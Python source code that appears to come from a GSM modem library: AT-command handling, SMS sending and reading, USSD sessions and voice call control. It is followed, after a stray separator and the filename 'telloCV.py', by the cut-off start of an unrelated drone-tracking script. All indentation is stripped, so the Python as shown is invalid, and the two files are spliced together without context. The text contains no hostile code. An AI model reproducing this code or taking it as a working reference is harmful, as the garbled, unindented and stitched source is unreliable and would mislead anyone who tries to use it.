@param parseError: If True, a CommandError is raised if the modem responds with an error (otherwise the response is returned as-is)
@type parseError: bool
@param writeTerm: The terminating sequence to append to the written data
@type writeTerm: str
@param expectedResponseTermSeq: The expected terminating sequence that marks the end of the modem's response (defaults to '\r\n')
@type expectedResponseTermSeq: str
@raise CommandError: if the command returns an error (only if parseError parameter is True)
@raise TimeoutException: if no response to the command was received from the modem
@return: A list containing the response lines from the modem, or None if waitForResponse is False
@rtype: list
"""
self.log.debug('write: %s', data)
responseLines = SerialComms.write(self, data + writeTerm, waitForResponse=waitForResponse, timeout=timeout, expectedResponseTermSeq=expectedResponseTermSeq)
if self._writeWait > 0: # Sleep a bit if required (some older modems suffer under load)
time.sleep(self._writeWait)
if waitForResponse:
cmdStatusLine = responseLines[-1]
if parseError:
if 'ERROR' in cmdStatusLine:
cmErrorMatch = self.CM_ERROR_REGEX.match(cmdStatusLine)
if cmErrorMatch:
errorType = cmErrorMatch.group(1)
errorCode = int(cmErrorMatch.group(2))
if errorCode == 515 or errorCode == 14:
# 515 means: "Please wait, init or command processing in progress."
# 14 means "SIM busy"
self._writeWait += 0.2 # Increase waiting period temporarily
# Retry the command after waiting a bit
self.log.debug('Device/SIM busy error detected; self._writeWait adjusted to %fs', self._writeWait)
time.sleep(self._writeWait)
result = self.write(data, waitForResponse, timeout, parseError, writeTerm, expectedResponseTermSeq)
self.log.debug('self_writeWait set to 0.1 because of recovering from device busy (515) error')
if errorCode == 515:
self._writeWait = 0.1 # Set this to something sane for further commands (slow modem)
else:
self._writeWait = 0 # The modem was just waiting for the SIM card
return result
if errorType == 'CME':
raise CmeError(data, int(errorCode))
else: # CMS error
raise CmsError(data, int(errorCode))
else:
raise CommandError(data)
elif cmdStatusLine == 'COMMAND NOT SUPPORT': # Some Huawei modems respond with this for unknown commands
raise CommandError(data + '({0})'.format(cmdStatusLine))
return responseLines
@property
def signalStrength(self):
""" Checks the modem's cellular network signal strength
@raise CommandError: if an error occurs
@return: The network signal strength as an integer between 0 and 99, or -1 if it is unknown
@rtype: int
"""
csq = self.CSQ_REGEX.match(self.write('AT+CSQ')[0])
if csq:
ss = int(csq.group(1))
return ss if ss != 99 else -1
else:
raise CommandError()
@property
def manufacturer(self):
""" @return: The modem's manufacturer's name """
return self.write('AT+CGMI')[0]
@property
def model(self):
""" @return: The modem's model name """
return self.write('AT+CGMM')[0]
@property
def revision(self):
""" @return: The modem's software revision, or None if not known/supported """
try:
return self.write('AT+CGMR')[0]
except CommandError:
return None
@property
def imei(self):
""" @return: The modem's serial number (IMEI number) """
return self.write('AT+CGSN')[0]
@property
def imsi(self):
""" @return: The IMSI (International Mobile Subscriber Identity) of the SIM card. The PIN may need to be entered before reading the IMSI """
return self.write('AT+CIMI')[0]
@property
def networkName(self):
""" @return: the name of the GSM Network Operator to which the modem is connected """
copsMatch = lineMatching(r'^\+COPS: (\d),(\d),"(.+)",{0,1}\d*$', self.write('AT+COPS?')) # response format: +COPS: mode,format,"operator_name",x
if copsMatch:
return copsMatch.group(3)
@property
def supportedCommands(self):
""" @return: list of AT commands supported by this modem (without the AT prefix). Returns None if not known """
try:
# AT+CLAC responses differ between modems. Most respond with +CLAC: and then a comma-separated list of commands
# while others simply return each command on a new line, with no +CLAC: prefix
response = self.write('AT+CLAC')
if len(response) == 2: # Single-line response, comma separated
commands = response[0]
if commands.startswith('+CLAC'):
commands = commands[6:] # remove the +CLAC: prefix before splitting
return commands.split(',')
elif len(response) > 2: # Multi-line response
return [cmd.strip() for cmd in response[:-1]]
else:
self.log.debug('Unhandled +CLAC response: {0}'.format(response))
return None
except CommandError:
return None
@property
def smsTextMode(self):
""" @return: True if the modem is set to use text mode for SMS, False if it is set to use PDU mode """
return self._smsTextMode
@smsTextMode.setter
def smsTextMode(self, textMode):
""" Set to True for the modem to use text mode for SMS, or False for it to use PDU mode """
if textMode != self._smsTextMode:
if self.alive:
self.write('AT+CMGF={0}'.format(1 if textMode else 0))
self._smsTextMode = textMode
self._compileSmsRegexes()
def _setSmsMemory(self, readDelete=None, write=None):
""" Set the current SMS memory to use for read/delete/write operations """
# Switch to the correct memory type if required
if write != None and write != self._smsMemWrite:
self.write()
readDel = readDelete or self._smsMemReadDelete
self.write('AT+CPMS="{0}","{1}"'.format(readDel, write))
self._smsMemReadDelete = readDel
self._smsMemWrite = write
elif readDelete != None and readDelete != self._smsMemReadDelete:
self.write('AT+CPMS="{0}"'.format(readDelete))
self._smsMemReadDelete = readDelete
def _compileSmsRegexes(self):
""" Compiles regular expression used for parsing SMS messages based on current mode """
if self._smsTextMode:
if self.CMGR_SM_DELIVER_REGEX_TEXT == None:
self.CMGR_SM_DELIVER_REGEX_TEXT = re.compile(r'^\+CMGR: "([^"]+)","([^"]+)",[^,]*,"([^"]+)"$')
self.CMGR_SM_REPORT_REGEXT_TEXT = re.compile(r'^\+CMGR: ([^,]*),\d+,(\d+),"{0,1}([^"]*)"{0,1},\d*,"([^"]+)","([^"]+)",(\d+)$')
elif self.CMGR_REGEX_PDU == None:
self.CMGR_REGEX_PDU = re.compile(r'^\+CMGR: (\d+),(\d*),(\d+)$')
@property
def smsc(self):
""" @return: The default SMSC number stored on the SIM card """
if self._smscNumber == None:
try:
readSmsc = self.write('AT+CSCA?')
except SmscNumberUnknownError:
pass # Some modems return a CMS 330 error if the value isn't set
else:
cscaMatch = lineMatching(r'\+CSCA:\s*"([^,]+)",(\d+)$', readSmsc)
if cscaMatch:
self._smscNumber = cscaMatch.group(1)
return self._smscNumber
@smsc.setter
def smsc(self, smscNumber):
""" Set the default SMSC number to use when sending SMS messages """
if smscNumber != self._smscNumber:
if self.alive:
self.write('AT+CSCA="{0}"'.format(smscNumber))
self._smscNumber = smscNumber
def waitForNetworkCoverage(self, timeout=None):
""" Block until the modem has GSM network coverage.
This method blocks until the modem is registered with the network
and the signal strength is greater than 0, optionally timing out
if a timeout was specified
@param timeout: Maximum time to wait for network coverage, in seconds
@type timeout: int or float
@raise TimeoutException: if a timeout was specified and reached
@raise InvalidStateException: if the modem is not going to receive network coverage (SIM blocked, etc)
@return: the current signal strength
@rtype: int
"""
block = [True]
if timeout != None:
# Set up a timeout mechanism
def _cancelBlock():
block[0] = False
t = threading.Timer(timeout, _cancelBlock)
t.start()
ss = -1
checkCreg = True
while block[0]:
if checkCreg:
cregResult = lineMatching(r'^\+CREG:\s*(\d),(\d)$', self.write('AT+CREG?', parseError=False)) # example result: +CREG: 0,1
if cregResult:
status = int(cregResult.group(2))
if status in (1, 5):
# 1: registered, home network, 5: registered, roaming
# Now simply check and return network signal strength
checkCreg = False
elif status == 3:
raise InvalidStateException('Network registration denied')
elif status == 0:
raise InvalidStateException('Device not searching for network operator')
else:
# Disable network registration check; only use signal strength
self.log.info('+CREG check disabled due to invalid response or unsupported command')
checkCreg = False
else:
# Check signal strength
ss = self.signalStrength
if ss > 0:
return ss
time.sleep(0.2)
else:
# If this is reached, the timer task has triggered
raise TimeoutException()
def sendSms(self, destination, text, waitForDeliveryReport=False, deliveryTimeout=15):
""" Send an SMS text message
@param destination: the recipient's phone number
@type destination: str
@param text: the message text
@type text: str
@param waitForDeliveryReport: if True, this method blocks until a delivery report is received for the sent message
@type waitForDeliveryReport: boolean
@param deliveryReport: the maximum time in seconds to wait for a delivery report (if "waitForDeliveryReport" is True)
@type deliveryTimeout: int or float
@raise CommandError: if an error occurs while attempting to send the message
@raise TimeoutException: if the operation times out
"""
if self._smsTextMode:
self.write('AT+CMGS="{0}"'.format(destination), timeout=3, expectedResponseTermSeq='> ')
result = lineStartingWith('+CMGS:', self.write(text, timeout=15, writeTerm=chr(26)))
else:
pdus = encodeSmsSubmitPdu(destination, text, reference=self._smsRef)
for pdu in pdus:
self.write('AT+CMGS={0}'.format(pdu.tpduLength), timeout=3, expectedResponseTermSeq='> ')
result = lineStartingWith('+CMGS:', self.write(str(pdu), timeout=15, writeTerm=chr(26))) # example: +CMGS: xx
if result == None:
raise CommandError('Modem did not respond with +CMGS response')
reference = int(result[7:])
self._smsRef = reference + 1
if self._smsRef > 255:
self._smsRef = 0
sms = SentSms(destination, text, reference)
# Add a weak-referenced entry for this SMS (allows us to update the SMS state if a status report is received)
self.sentSms[reference] = sms
if waitForDeliveryReport:
self._smsStatusReportEvent = threading.Event()
if self._smsStatusReportEvent.wait(deliveryTimeout):
self._smsStatusReportEvent = None
else: # Response timed out
self._smsStatusReportEvent = None
raise TimeoutException()
return sms
def sendUssd(self, ussdString, responseTimeout=15):
""" Starts a USSD session by dialing the the specified USSD string, or \
sends the specified string in the existing USSD session (if any)
@param ussdString: The USSD access number to dial
@param responseTimeout: Maximum time to wait a response, in seconds
@raise TimeoutException: if no response is received in time
@return: The USSD response message/session (as a Ussd object)
@rtype: gsmmodem.modem.Ussd
"""
self._ussdSessionEvent = threading.Event()
try:
cusdResponse = self.write('AT+CUSD=1,"{0}",15'.format(ussdString), timeout=responseTimeout) # Should respond with "OK"
except Exception:
self._ussdSessionEvent = None # Cancel the thread sync lock
raise
# Some modems issue the +CUSD response before the acknowledgment "OK" - check for that
if len(cusdResponse) > 1:
# Look for more than one +CUSD response because of certain modems' strange behaviour
cusdMatches = allLinesMatchingPattern(self.CUSD_REGEX, cusdResponse)
if len(cusdMatches) > 0:
self._ussdSessionEvent = None # Cancel thread sync lock
return self._parseCusdResponse(cusdMatches)
# Wait for the +CUSD notification message
if self._ussdSessionEvent.wait(responseTimeout):
self._ussdSessionEvent = None
return self._ussdResponse
else: # Response timed out
self._ussdSessionEvent = None
raise TimeoutException()
def dial(self, number, timeout=5, callStatusUpdateCallbackFunc=None):
""" Calls the specified phone number using a voice phone call
@param number: The phone number to dial
@param timeout: Maximum time to wait for the call to be established
@param callStatusUpdateCallbackFunc: Callback function that is executed if the call's status changes due to
remote events (i.e. when it is answered, the call is ended by the remote party)
@return: The outgoing call
@rtype: gsmmodem.modem.Call
"""
if self._waitForCallInitUpdate:
# Wait for the "call originated" notification message
self._dialEvent = threading.Event()
try:
ret = self.write('ATD{0};'.format(number), timeout=timeout, waitForResponse=self._waitForAtdResponse)
except Exception:
self._dialEvent = None # Cancel the thread sync lock
raise
else:
# Don't wait for a call init update - base the call ID on the number of active calls
self.write('ATD{0};'.format(number), timeout=timeout, waitForResponse=self._waitForAtdResponse)
self.log.debug("Not waiting for outgoing call init update message")
callId = len(self.activeCalls) + 1
callType = 0 # Assume voice
call = Call(self, callId, callType, number, callStatusUpdateCallbackFunc)
self.activeCalls[callId] = call
return call
if self._mustPollCallStatus:
# Fake a call notification by polling call status until the status indicates that the call is being dialed
threading.Thread(target=self._pollCallStatus, kwargs={'expectedState': 0, 'timeout': timeout}).start()
if self._dialEvent.wait(timeout):
self._dialEvent = None
callId, callType = self._dialResponse
call = Call(self, callId, callType, number, callStatusUpdateCallbackFunc)
self.activeCalls[callId] = call
return call
else: # Call establishing timed out
self._dialEvent = None
raise TimeoutException()
def processStoredSms(self, unreadOnly=False):
""" Process all SMS messages currently stored on the device/SIM card.
Reads all (or just unread) received SMS messages currently stored on the
device/SIM card, initiates "SMS received" events for them, and removes
them from the SIM card.
This is useful if SMS messages were received during a period that
python-gsmmodem was not running but the modem was powered on.
@param unreadOnly: If True, only process unread SMS messages
@type unreadOnly: boolean
"""
states = [Sms.STATUS_RECEIVED_UNREAD]
if not unreadOnly:
states.insert(0, Sms.STATUS_RECEIVED_READ)
for msgStatus in states:
messages = self.listStoredSms(status=msgStatus, delete=True)
for sms in messages:
self.smsReceivedCallback(sms)
def listStoredSms(self, status=Sms.STATUS_ALL, memory=None, delete=False):
""" Returns SMS messages currently stored on the device/SIM card.
The messages are read from the memory set by the "memory" parameter.
@param status: Filter messages based on this read status; must be 0-4 (see Sms class)
@type status: int
@param memory: The memory type to read from. If None, use the current default SMS read memory
@type memory: str or None
@param delete: If True, delete returned messages from the device/SIM card
@type delete: bool
@return: A list of Sms objects containing the messages read
@rtype: list
"""
self._setSmsMemory(readDelete=memory)
messages = []
delMessages = set()
if self._smsTextMode:
cmglRegex= re.compile(r'^\+CMGL: (\d+),"([^"]+)","([^"]+)",[^,]*,"([^"]+)"$')
for key, val in dictItemsIter(Sms.TEXT_MODE_STATUS_MAP):
if status == val:
statusStr = key
break
else:
raise ValueError('Invalid status value: {0}'.format(status))
result = self.write('AT+CMGL="{0}"'.format(statusStr))
msgLines = []
msgIndex = msgStatus = number = msgTime = None
for line in result:
cmglMatch = cmglRegex.match(line)
if cmglMatch:
# New message; save old one if applicable
if msgIndex != None and len(msgLines) > 0:
msgText = '\n'.join(msgLines)
msgLines = []
messages.append(ReceivedSms(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], number, parseTextModeTimeStr(msgTime), msgText))
delMessages.add(int(msgIndex))
msgIndex, msgStatus, number, msgTime = cmglMatch.groups()
msgLines = []
else:
if line != 'OK':
msgLines.append(line)
if msgIndex != None and len(msgLines) > 0:
msgText = '\n'.join(msgLines)
msgLines = []
messages.append(ReceivedSms(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], number, parseTextModeTimeStr(msgTime), msgText))
delMessages.add(int(msgIndex))
else:
cmglRegex = re.compile(r'^\+CMGL:\s*(\d+),(\d+),.*$')
readPdu = False
result = self.write('AT+CMGL={0}'.format(status),timeout=100)
for line in result:
if not readPdu:
cmglMatch = cmglRegex.match(line)
if cmglMatch:
msgIndex = int(cmglMatch.group(1))
msgStat = int(cmglMatch.group(2))
readPdu = True
else:
try:
smsDict = decodeSmsPdu(line)
except EncodingError:
self.log.debug('Discarding line from +CMGL response: %s', line)
else:
if smsDict['type'] == 'SMS-DELIVER':
sms = ReceivedSms(self, int(msgStat), smsDict['number'], smsDict['time'], smsDict['text'], smsDict['smsc'])
elif smsDict['type'] == 'SMS-STATUS-REPORT':
sms = StatusReport(self, int(msgStat), smsDict['reference'], smsDict['number'], smsDict['time'], smsDict['discharge'], smsDict['status'])
else:
raise CommandError('Invalid PDU type for readStoredSms(): {0}'.format(smsDict['type']))
messages.append(sms)
delMessages.add(msgIndex)
readPdu = False
if delete:
if status == Sms.STATUS_ALL:
# Delete all messages
self.deleteMultipleStoredSms()
else:
for msgIndex in delMessages:
self.deleteStoredSms(msgIndex)
return messages
def _handleModemNotification(self, lines):
""" Handler for unsolicited notifications from the modem
This method simply spawns a separate thread to handle the actual notification
(in order to release the read thread so that the handlers are able to write back to the modem, etc)
@param lines The lines that were read
"""
threading.Thread(target=self.__threadedHandleModemNotification, kwargs={'lines': lines}).start()
def __threadedHandleModemNotification(self, lines):
""" Implementation of _handleModemNotification() to be run in a separate thread
@param lines The lines that were read
"""
for line in lines:
if 'RING' in line:
# Incoming call (or existing call is ringing)
self._handleIncomingCall(lines)
return
elif line.startswith('+CMTI'):
# New SMS message indication
self._handleSmsReceived(line)
return
elif line.startswith('+CUSD'):
# USSD notification - either a response or a MT-USSD ("push USSD") message
self._handleUssd(lines)
return
elif line.startswith('+CDSI'):
# SMS status report
self._handleSmsStatusReport(line)
return
else:
# Check for call status updates
for updateRegex, handlerFunc in self._callStatusUpdates:
match = updateRegex.match(line)
if match:
# Handle the update
handlerFunc(match)
return
# If this is reached, the notification wasn't handled
self.log.debug('Unhandled unsolicited modem notification: %s', lines)
def _handleIncomingCall(self, lines):
self.log.debug('Handling incoming call')
ringLine = lines.pop(0)
if self._extendedIncomingCallIndication:
try:
callType = ringLine.split(' ', 1)[1]
except IndexError:
# Some external 3G scripts modify incoming call indication settings (issue #18)
self.log.debug('Extended incoming call indication format changed externally; re-enabling...')
callType = None
try:
# Re-enable extended format of incoming indication (optional)
self.write('AT+CRC=1')
except CommandError:
self.log.warn('Extended incoming call indication format changed externally; unable to re-enable')
self._extendedIncomingCallIndication = False
else:
callType = None
if self._callingLineIdentification and len(lines) > 0:
clipLine = lines.pop(0)
clipMatch = self.CLIP_REGEX.match(clipLine)
if clipMatch:
callerNumber = clipMatch.group(1)
ton = clipMatch.group(2)
#TODO: re-add support for this
callerName = None
#callerName = clipMatch.group(3)
#if callerName != None and len(callerName) == 0:
# callerName = None
else:
callerNumber = ton = callerName = None
else:
callerNumber = ton = callerName = None
call = None
for activeCall in dictValuesIter(self.activeCalls):
if activeCall.number == callerNumber:
call = activeCall
call.ringCount += 1
if call == None:
callId = len(self.activeCalls) + 1;
call = IncomingCall(self, callerNumber, ton, callerName, callId, callType)
self.activeCalls[callId] = call
self.incomingCallCallback(call)
def _handleCallInitiated(self, regexMatch, callId=None, callType=1):
""" Handler for "outgoing call initiated" event notification line """
if self._dialEvent:
if regexMatch:
groups = regexMatch.groups()
# Set self._dialReponse to (callId, callType)
if len(groups) >= 2:
self._dialResponse = (int(groups[0]) , int(groups[1]))
else:
self._dialResponse = (int(groups[0]), 1) # assume call type: VOICE
else:
self._dialResponse = callId, callType
self._dialEvent.set()
def _handleCallAnswered(self, regexMatch, callId=None):
""" Handler for "outgoing call answered" event notification line """
if regexMatch:
groups = regexMatch.groups()
if len(groups) > 1:
callId = int(groups[0])
self.activeCalls[callId].answered = True
else:
# Call ID not available for this notificition - check for the first outgoing call that has not been answered
for call in dictValuesIter(self.activeCalls):
if call.answered == False and type(call) == Call:
call.answered = True
return
else:
# Use supplied values
self.activeCalls[callId].answered = True
def _handleCallEnded(self, regexMatch, callId=None, filterUnanswered=False):
if regexMatch:
groups = regexMatch.groups()
if len(groups) > 0:
callId = int(groups[0])
else:
# Call ID not available for this notification - check for the first outgoing call that is active
for call in dictValuesIter(self.activeCalls):
if type(call) == Call:
if not filterUnanswered or (filterUnanswered == True and call.answered == False):
callId = call.id
break
if callId and callId in self.activeCalls:
self.activeCalls[callId].answered = False
self.activeCalls[callId].active = False
del self.activeCalls[callId]
def _handleCallRejected(self, regexMatch, callId=None):
""" Handler for rejected (unanswered calls being ended)
Most modems use _handleCallEnded for handling both call rejections and remote hangups.
This method does the same, but filters for unanswered calls only.
"""
return self._handleCallEnded(regexMatch, callId, True)
def _handleSmsReceived(self, notificationLine):
""" Handler for "new SMS" unsolicited notification line """
self.log.debug('SMS message received')
cmtiMatch = self.CMTI_REGEX.match(notificationLine)
if cmtiMatch:
msgMemory = cmtiMatch.group(1)
msgIndex = cmtiMatch.group(2)
sms = self.readStoredSms(msgIndex, msgMemory)
self.deleteStoredSms(msgIndex)
self.smsReceivedCallback(sms)
def _handleSmsStatusReport(self, notificationLine):
""" Handler for SMS status reports """
self.log.debug('SMS status report received')
cdsiMatch = self.CDSI_REGEX.match(notificationLine)
if cdsiMatch:
msgMemory = cdsiMatch.group(1)
msgIndex = cdsiMatch.group(2)
report = self.readStoredSms(msgIndex, msgMemory)
self.deleteStoredSms(msgIndex)
# Update sent SMS status if possible
if report.reference in self.sentSms:
self.sentSms[report.reference].report = report
if self._smsStatusReportEvent:
# A sendSms() call is waiting for this response - notify waiting thread
self._smsStatusReportEvent.set()
else:
# Nothing is waiting for this report directly - use callback
self.smsStatusReportCallback(report)
def readStoredSms(self, index, memory=None):
""" Reads and returns the SMS message at the specified index
@param index: The index of the SMS message in the specified memory
@type index: int
@param memory: The memory type to read from. If None, use the current default SMS read memory
@type memory: str or None
@raise CommandError: if unable to read the stored message
@return: The SMS message
@rtype: subclass of gsmmodem.modem.Sms (either ReceivedSms or StatusReport)
"""
# Switch to the correct memory type if required
self._setSmsMemory(readDelete=memory)
msgData = self.write('AT+CMGR={0}'.format(index))
# Parse meta information
if self._smsTextMode:
cmgrMatch = self.CMGR_SM_DELIVER_REGEX_TEXT.match(msgData[0])
if cmgrMatch:
msgStatus, number, msgTime = cmgrMatch.groups()
msgText = '\n'.join(msgData[1:-1])
return ReceivedSms(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], number, parseTextModeTimeStr(msgTime), msgText)
else:
# Try parsing status report
cmgrMatch = self.CMGR_SM_REPORT_REGEXT_TEXT.match(msgData[0])
if cmgrMatch:
msgStatus, reference, number, sentTime, deliverTime, deliverStatus = cmgrMatch.groups()
if msgStatus.startswith('"'):
msgStatus = msgStatus[1:-1]
if len(msgStatus) == 0:
msgStatus = "REC UNREAD"
return StatusReport(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], int(reference), number, parseTextModeTimeStr(sentTime), parseTextModeTimeStr(deliverTime), int(deliverStatus))
else:
raise CommandError('Failed to parse text-mode SMS message +CMGR response: {0}'.format(msgData))
else:
cmgrMatch = self.CMGR_REGEX_PDU.match(msgData[0])
if not cmgrMatch:
raise CommandError('Failed to parse PDU-mode SMS message +CMGR response: {0}'.format(msgData))
stat, alpha, length = cmgrMatch.groups()
pdu = msgData[1]
smsDict = decodeSmsPdu(pdu)
if smsDict['type'] == 'SMS-DELIVER':
return ReceivedSms(self, int(stat), smsDict['number'], smsDict['time'], smsDict['text'], smsDict['smsc'])
elif smsDict['type'] == 'SMS-STATUS-REPORT':
return StatusReport(self, int(stat), smsDict['reference'], smsDict['number'], smsDict['time'], smsDict['discharge'], smsDict['status'])
else:
raise CommandError('Invalid PDU type for readStoredSms(): {0}'.format(smsDict['type']))
def deleteStoredSms(self, index, memory=None):
""" Deletes the SMS message stored at the specified index in modem/SIM card memory
@param index: The index of the SMS message in the specified memory
@type index: int
@param memory: The memory type to delete from. If None, use the current default SMS read/delete memory
@type memory: str or None
@raise CommandError: if unable to delete the stored message
"""
self._setSmsMemory(readDelete=memory)
self.write('AT+CMGD={0},0'.format(index))
def deleteMultipleStoredSms(self, delFlag=4, memory=None):
""" Deletes all SMS messages that have the specified read status.
The messages are read from the memory set by the "memory" parameter.
The value of the "delFlag" paramater is the same as the "DelFlag" parameter of the +CMGD command:
1: Delete All READ messages
2: Delete All READ and SENT messages
3: Delete All READ, SENT and UNSENT messages
4: Delete All messages (this is the default)
@param delFlag: Controls what type of messages to delete; see description above.
@type delFlag: int
@param memory: The memory type to delete from. If None, use the current default SMS read/delete memory
@type memory: str or None
@param delete: If True, delete returned messages from the device/SIM card
@type delete: bool
@raise ValueErrror: if "delFlag" is not in range [1,4]
@raise CommandError: if unable to delete the stored messages
"""
if 0 < delFlag <= 4:
self._setSmsMemory(readDelete=memory)
self.write('AT+CMGD=1,{0}'.format(delFlag),timeout=100)
else:
raise ValueError('"delFlag" must be in range [1,4]')
def _handleUssd(self, lines):
""" Handler for USSD event notification line(s) """
if self._ussdSessionEvent:
# A sendUssd() call is waiting for this response - parse it
cusdMatches = allLinesMatchingPattern(self.CUSD_REGEX, lines)
if len(cusdMatches) > 0:
self._ussdResponse = self._parseCusdResponse(cusdMatches)
# Notify waiting thread
self._ussdSessionEvent.set()
def _parseCusdResponse(self, cusdMatches):
""" Parses one or more +CUSD notification lines (for USSD)
@return: USSD response object
@rtype: gsmmodem.modem.Ussd
"""
message = None
sessionActive = True
if len(cusdMatches) > 1:
self.log.debug('Multiple +CUSD responses received; filtering...')
# Some modems issue a non-standard "extra" +CUSD notification for releasing the session
for cusdMatch in cusdMatches:
if cusdMatch.group(1) == '2':
# Set the session to inactive, but ignore the message
self.log.debug('Ignoring "session release" message: %s', cusdMatch.group(2))
sessionActive = False
else:
# Not a "session release" message
message = cusdMatch.group(2)
if sessionActive and cusdMatch.group(1) != '1':
sessionActive = False
else:
sessionActive = cusdMatches[0].group(1) == '1'
message = cusdMatches[0].group(2)
return Ussd(self, sessionActive, message)
def _placeHolderCallback(self, *args):
""" Does nothing """
self.log.debug('called with args: {0}'.format(args))
def _pollCallStatus(self, expectedState, callId=None, timeout=None):
""" Poll the status of outgoing calls.
This is used for modems that do not have a known set of call status update notifications.
@param expectedState: The internal state we are waiting for. 0 == initiated, 1 == answered, 2 = hangup
@type expectedState: int
@raise TimeoutException: If a timeout was specified, and has occurred
"""
callDone = False
timeLeft = timeout or 999999
while self.alive and not callDone and timeLeft > 0:
time.sleep(0.5)
if expectedState == 0: # Only call initializing can timeout
timeLeft -= 0.5
try:
clcc = self._pollCallStatusRegex.match(self.write('AT+CLCC')[0])
except TimeoutException as timeout:
# Can happend if the call was ended during our time.sleep() call
clcc = None
if clcc:
direction = int(clcc.group(2))
if direction == 0: # Outgoing call
# Determine call state
stat = int(clcc.group(3))
if expectedState == 0: # waiting for call initiated
if stat == 2 or stat == 3: # Dialing or ringing ("alerting")
callId = int(clcc.group(1))
callType = int(clcc.group(4))
self._handleCallInitiated(None, callId, callType) # if self_dialEvent is None, this does nothing
expectedState = 1 # Now wait for call answer
elif expectedState == 1: # waiting for call to be answered
if stat == 0: # Call active
callId = int(clcc.group(1))
self._handleCallAnswered(None, callId)
expectedState = 2 # Now wait for call hangup
elif expectedState == 2 : # waiting for remote hangup
# Since there was no +CLCC response, the call is no longer active
callDone = True
self._handleCallEnded(None, callId=callId)
elif expectedState == 1: # waiting for call to be answered
# Call was rejected
callDone = True
self._handleCallRejected(None, callId=callId)
if timeLeft <= 0:
raise TimeoutException()
class Call(object):
""" A voice call """
DTMF_COMMAND_BASE = '+VTS='
dtmfSupport = False # Indicates whether or not DTMF tones can be sent in calls
def __init__(self, gsmModem, callId, callType, number, callStatusUpdateCallbackFunc=None):
"""
@param gsmModem: GsmModem instance that created this object
@param number: The number that is being called
"""
self._gsmModem = weakref.proxy(gsmModem)
self._callStatusUpdateCallbackFunc = callStatusUpdateCallbackFunc
# Unique ID of this call
self.id = callId
# Call type (VOICE == 0, etc)
self.type = callType
# The remote number of this call (destination or origin)
self.number = number
# Flag indicating whether the call has been answered or not (backing field for "answered" property)
self._answered = False
# Flag indicating whether or not the call is active
# (meaning it may be ringing or answered, but not ended because of a hangup event)
self.active = True
@property
def answered(self):
return self._answered
@answered.setter
def answered(self, answered):
self._answered = answered
if self._callStatusUpdateCallbackFunc:
self._callStatusUpdateCallbackFunc(self)
def sendDtmfTone(self, tones):
""" Send one or more DTMF tones to the remote party (only allowed for an answered call)
Note: this is highly device-dependent, and might not work
@param digits: A str containining one or more DTMF tones to play, e.g. "3" or "*123#"
@raise CommandError: if the command failed/is not supported
@raise InvalidStateException: if the call has not been answered, or is ended while the command is still executing
"""
if self.answered:
dtmfCommandBase = self.DTMF_COMMAND_BASE.format(cid=self.id)
toneLen = len(tones)
if len(tones) > 1:
cmd = ('AT{0}{1};{0}' + ';{0}'.join(tones[1:])).format(dtmfCommandBase, tones[0])
else:
cmd = 'AT{0}{1}'.format(dtmfCommandBase, tones)
try:
self._gsmModem.write(cmd, timeout=(5 + toneLen))
except CmeError as e:
if e.code == 30:
# No network service - can happen if call is ended during DTMF transmission (but also if DTMF is sent immediately after call is answered)
raise InterruptedException('No network service', e)
elif e.code == 3:
# Operation not allowed - can happen if call is ended during DTMF transmission
raise InterruptedException('Operation not allowed', e)
else:
raise e
else:
raise InvalidStateException('Call is not active (it has not yet been answered, or it has ended).')
def hangup(self):
""" End the phone call.
Does nothing if the call is already inactive.
"""
if self.active:
self._gsmModem.write('ATH')
self.answered = False
self.active = False
if self.id in self._gsmModem.activeCalls:
del self._gsmModem.activeCalls[self.id]
class IncomingCall(Call):
CALL_TYPE_MAP = {'VOICE': 0}
""" Represents an incoming call, conveniently allowing access to call meta information and -control """
def __init__(self, gsmModem, number, ton, callerName, callId, callType):
"""
@param gsmModem: GsmModem instance that created this object
@param number: Caller number
@param ton: TON (type of number/address) in integer format
@param callType: Type of the incoming call (VOICE, FAX, DATA, etc)
"""
if type(callType) == str:
callType = self.CALL_TYPE_MAP[callType]
super(IncomingCall, self).__init__(gsmModem, callId, callType, number)
# Type attribute of the incoming call
self.ton = ton
self.callerName = callerName
# Flag indicating whether the call is ringing or not
self.ringing = True
# Amount of times this call has rung (before answer/hangup)
self.ringCount = 1
def answer(self):
""" Answer the phone call.
@return: self (for chaining method calls)
"""
if self.ringing:
self._gsmModem.write('ATA')
self.ringing = False
self.answered = True
return self
def hangup(self):
""" End the phone call. """
self.ringing = False
super(IncomingCall, self).hangup()
class Ussd(object):
""" Unstructured Supplementary Service Data (USSD) message.
This class contains convenient methods for replying to a USSD prompt
and to cancel the USSD session
"""
def __init__(self, gsmModem, sessionActive, message):
self._gsmModem = weakref.proxy(gsmModem)
# Indicates if the session is active (True) or has been closed (False)
self.sessionActive = sessionActive
self.message = message
def reply(self, message):
""" Sends a reply to this USSD message in the same USSD session
@raise InvalidStateException: if the USSD session is not active (i.e. it has ended)
@return: The USSD response message/session (as a Ussd object)
"""
if self.sessionActive:
return self._gsmModem.sendUssd(message)
else:
raise InvalidStateException('USSD session is inactive')
def cancel(self):
""" Terminates/cancels the USSD session (without sending a reply)
Does nothing if the USSD session is inactive.
"""
if self.sessionActive:
self._gsmModem.write('AT+CUSD=2')
|
telloCV.py
|
"""
tellotracker:
Allows manual operation of the drone and demo tracking mode.
Requires mplayer to record/save video.
Controls:
- tab to lift off
- WASD to move the drone
- space/shift to ascend/descent slowly
- Q/E to yaw slowly
- arrow keys to ascend, descend, or yaw quickly
- backspace to land, or P to palm-land
- enter to take a picture
- R to start recording video, R again to stop recording
(video and photos will be saved to a timestamped file in ~/Pictures/)
- Z to toggle camera zoom state
(zoomed-in widescreen or high FOV 4:3)
- T to toggle tracking
@author Leonie Buckley, Saksham Sinha and Jonathan Byrne
@copyright 2018 see license file for details
"""
import time
import datetime
import os
import tellopy
import numpy
import av
import cv2
from pynput import keyboard
from tracker import Tracker
#posenet
import os
import numpy as np
import sys
from tensorflow.lite.python.interpreter import Interpreter
from PIL import Image
import math
import threading
import traceback
frame = None
run_recv_thread = True
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def argmax2d(inp_3d):
"""
Get the x,y positions of the heatmap of each part's argmax()
"""
heatmapPositions = np.zeros(shape=(17,2))
heatmapConf = np.zeros(shape=(17,1))
for i in range(17):
argmax_i = np.unravel_index(inp_3d[:,:,i].argmax(), inp_3d[:,:,i].shape)
max_i = inp_3d[:,:,i].max()
heatmapPositions[i,:] = argmax_i
